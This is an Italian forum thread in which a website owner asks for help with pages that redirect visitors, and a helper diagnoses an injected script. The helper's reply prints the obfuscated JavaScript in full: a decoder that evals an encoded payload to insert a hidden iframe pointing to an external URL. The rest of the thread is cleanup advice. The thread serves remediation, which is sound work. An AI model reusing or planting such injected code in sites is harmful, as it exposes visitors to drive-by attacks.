Problemi con malware sul sito

[webbeginner]

Buongiorno, accade che nello spazio dove è ospitato il mio sito vi sia un malware che sta progressivamente intaccando
l'accessibilità del sito. (dopo alcuni secondi si viene rimandati al un link Sony)
Ho chiesto il parere di un tecnico programmatore mio amico ma mi ha detto che io non posso fare nulla al riguardo. Ma forse qualcosa si puo' fare.
Potete aiutarmi per favore? Per me rappresenta un grosso problema.
Tra l'altro il sito ora è molto conosciuto e ho contatti giornalieri.
Queste sono le 2 gallery che al momento risultano patire del problema:


Grazie.



http://www.emiliorescigno.it/ILTRENOEILTEOREMA/album/index.html

http://www.emiliorescigno.it/new/Istanbul/album/index.html

[Habanero]

Con tutto il rispetto per il tuo amico tecnico programmatore (!!).... che significa che non puoi fare nulla a riguardo??? :-D


il responsabile è uno javascript che è stato iniettato nelle tue pagine.

Lo puoi trovare subito dopo il tag di apertura <body id="body" onload="keypresslistener();">
In pratica puoi eliminare tutto ciò che sta dopo sulla stessa riga.

Ecco il contenuto dello script:

codice:

<script language=JavaScript> function vhb3b23(x)	{var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,26,21,40,29,2,62,48,12,38,0,0,0,0,0,0,15,13,35,54,57,19,52,11,1,36,43,20,42,41,28,22,39,47,45,0,37,53,14,3,31,46,10,0,0,0,0,23,0,27,30,6,61,33,49,18,9,58,50,7,5,24,59,60,4,8,25,56,16,17,55,44,32,34,51);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(218^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}vhb3b23('RVGR6OaJFPLJniiJMbb0bOGR0CXs6OaYQbnQFiZdRyiwY6Joda6woyiYv6J6FYnR0bYQDYYnQGY6My1YPBQwYiLLx_XdyQJQ6VJJzOGRF_GLdOQJU_b0fXDYYZGd3OnJFiJo_YJJjg@LngJQUbJozW0sBnbizkX069niY0YsdkX0sJXJziJJjb6iwPY6j6nwdZJJPz6iiPLJB1nQPBQQz9LLCYn3xEaRF6G6IabdzjGLnbnQIv0o')</script>

Il codice offuscato serve ad inserire un iframe nascosto nella pagina. L'url richiamato dall'iframe è una cosa del tipohttp://8addition.org/t/?9229dc1458 che però sembra già essere stato disabilitato.



Fatto questo ti consiglio di verificare che i pc da cui fai l'upload via FTP non siano infetti.
Ti consiglio inoltre, solo dopo aver eventualmente ripulito i pc, di cambiare la password di accesso al server ftp.

[webbeginner]

Che roba ragazzi!!!! risposta a tempo di record. Ti ringrazio infinitamente per la tua
professionalità e disponibilitò.
Eseguiro' subito quanto mi hai suggerito.
L'unica cosa che non capisco è se lo devo togliere in pratica da tutte le pagine del sito,
e allora forse mi converrebbe cancellare tutto e rinviare il tutto. Il fatto è che sono piu'
di 300 mega e non vorrei poi che alcune cose o link non funzionassero piu' a dovere.

Grazie.

[webbeginner]

Ciao, ho rimosso e sostituito le due cartelle incriminate sul servere e ora mi sembra non diano piu' quell'inconveniente. Puoi provare anche tu? Grazie mille.

[Habanero]

Queste risultano ancora infette:


www.emiliorescigno.it\creta2006\HTML\index.htm
www.emiliorescigno.it\disney\Template.htm
http://www.emiliorescigno.it\grecia2...HTML\index.htm
www.emiliorescigno.it\honolulu\Template.htm
www.emiliorescigno.it\paris2\Template.htm
www.emiliorescigno.it\zoom\Template.htm


per trovare il punto in cui è presente lo script fai una ricerca della stringa vhb3b23(x)